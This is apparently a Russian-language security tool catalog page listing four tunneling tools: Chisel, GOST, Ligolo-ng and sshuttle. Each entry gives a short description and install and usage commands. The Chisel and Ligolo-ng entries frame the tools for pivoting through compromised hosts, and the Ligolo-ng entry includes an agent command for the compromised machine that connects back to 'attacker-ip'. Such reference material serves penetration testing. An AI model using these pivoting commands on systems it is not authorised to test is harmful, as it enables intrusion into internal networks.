Каталог инструментов

4 инструментов

Тег: tunneling ×

Chisel

v1.11.7
Exploitation

Быстрый TCP/UDP туннель через HTTP, защищённый SSH. Написан на Go. Используется для пивотинга — проброса трафика через скомпрометированный хост к недоступным сегментам сети. Один бинарник работает и как …

# Go install go install github.com/jpillora/chisel@latest # Готовые бинарники (Linux, Windows, macOS, ARM) # https://github.com/jpillora/chisel/releases # Из исходников git clone https://github.com/jpillora/chisel cd chisel && go build .

GOST

v3.2.6
Anonymizers

Go Simple Tunnel — универсальный прокси-туннелятор с цепочками транспортов. Единый бинарник умеет: SOCKS5, HTTP/HTTPS, Shadowsocks, SSH, WireGuard, Relay, mTLS, QUIC, WebSocket, gRPC и их комбинации. Ключевая фича — …

# Скачать бинарник wget https://github.com/go-gost/gost/releases/latest/download/gost_linux_amd64.tar.gz tar xzf gost_linux_amd64.tar.gz # SOCKS5-прокси на порту 1080 gost -L socks5://:1080 # Цепочка: SOCKS5 → SSH → SOCKS5 gost -L socks5://:1080 -F ssh://user@relay:22 -F socks5://final:1081 # DNS-over-TLS клиент gost -L dns://:53/1.1.1.1:853?mode=dot

Ligolo-ng

v0.8.3
Exploitation ★ featured

Продвинутый инструмент для туннелирования и пивотинга в сети с использованием TUN-интерфейса. Позволяет прозрачно направлять трафик через скомпрометированные хосты без socks-proxy. Возможности: - Прозрачный туннель через TUN-интерфейс (не SOCKS) …

# Скачать релизы (proxy + agent): # https://github.com/nicocha30/ligolo-ng/releases # На хосте атакующего (proxy): sudo ip tuntap add user $(whoami) mode tun ligolo sudo ip link set ligolo up ./proxy -selfcert -laddr 0.0.0.0:11601 # На скомпрометированной машине (agent): ./agent -connect attacker-ip:11601 -ignore-cert # В консоли proxy: session # выбрать агента ifconfig # посмотреть сети агента start # запустить туннель # Добавить маршрут к внутренней сети: sudo ip route add 192.168.1.0/24 dev ligolo

sshuttle

v1.3.2
Anonymizers ★ featured

"VPN over SSH" — создаёт прозрачный туннель поверх обычного SSH без root на удалённой стороне и без установки VPN-сервера. Заворачивает TCP и DNS-трафик через SSH-хост используя Python + …

pip install sshuttle # или apt install sshuttle # Весь трафик через SSH-хост sshuttle -r user@my.server 0/0 # Только подсеть 10.0.0.0/8 sshuttle -r user@my.server 10.0.0.0/8 # Включая DNS sshuttle --dns -r user@my.server 0/0